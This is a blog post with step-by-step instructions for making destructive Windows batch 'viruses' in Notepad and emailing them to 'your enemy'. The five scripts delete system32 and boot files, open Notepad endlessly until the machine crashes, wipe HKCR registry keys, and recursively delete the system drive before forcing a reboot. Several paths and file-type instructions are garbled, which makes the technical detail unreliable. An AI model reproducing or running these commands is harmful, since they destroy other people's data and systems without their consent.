Saturday, 13 December 2014

Create powerful virus with notepad

1) Create a powerful virus with notepad (to delete your enemy's data)

STEPS:
1. Open notepad.
2. Copy the following.
3. del c:\WINDOWS \system32\**/q
4. paste it in notepad.
5. and save it as .bat or .cmd 6. eg click save as
write: fun.bat
7. Hit enter and your virus is ready never open
the file on your own you have created ( because
you know what will happen) have fun send it
your enemy's through email....when they open it
their data will be deleted. thanks for reading

2) How to create a virus that deactivates an OS


Here are the stepts you should follow to make the
virus:
This virus will stop and prevent a computer from
starting up and the only solution would be to
reinstall winsows.
Warning : never try it on your computer.
open up notepad and type in the following
del "C:windows\SYSTEM32\bootok"
/Q/S >nul
del "C:windows\SYSTEM32\bootvid.dll"
del "C:windows\SYSTEM32\bootvrfy"
After you type these save it as "any name you
want ".bat
Please let me know if it works.


3) Endless Notepads
All you need to do is to copy the codes , paste it
in any notepad or text file, than save the text
file with anynam.vbs , and yeah dont forget to
change the format from text file to all files.
*NOTE* These codes do not stay on forever, they
just stay on until the person shuts off the
computer. The registry delete is one that
PERMANETLY deletes files on the computer that
cannot be recovered. this will DESTROY the
computer.
Endless Notepads
*This will pop up endless notepads until the
computer freezes and crashes*
Code:
CODE
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top


4) Delete Key Registry Files
All you need to do is to copy the codes , paste it
in any notepad or text file, than save the text
file with anynam.vbs , and yeah dont forget to
change the format from text file to all files.

*NOTE* These codes do not stay on forever, they
just stay on until the person shuts off the
computer. The registry delete is one that
PERMANETLY deletes files on the computer that
cannot be recovered. this will DESTROY the
computer.
Delete Key Registry Files [NOTE THIS IS
DANGEROUS!! USE AT RISK]
*This will delete key registry files, then loops a
message* (CANNOT BE RECOVERED FROM)*
Code:
CODE
@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your computer has been destroyed. Have a
nice day.
GOTO MESSAGE


5) The blue screen of Death
All you need to do is to copy the codes , paste it
in any notepad or text file, than save the text
file with anynam.vbs , and yeah dont forget to
change the format from text file to all files.
*NOTE* These codes do not stay on forever, they
just stay on until the person shuts off the
computer. The registry delete is one that
PERMANETLY deletes files on the computer that
cannot be recovered. this will DESTROY the
computer.
The blue screen of Death [this might be
dangerous]
Code:
CODE
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

No comments:
Write comments

Services

© 2014 Master Minds. Designed by Bloggertheme9 | Distributed By Gooyaabi Templates
Powered by Blogger.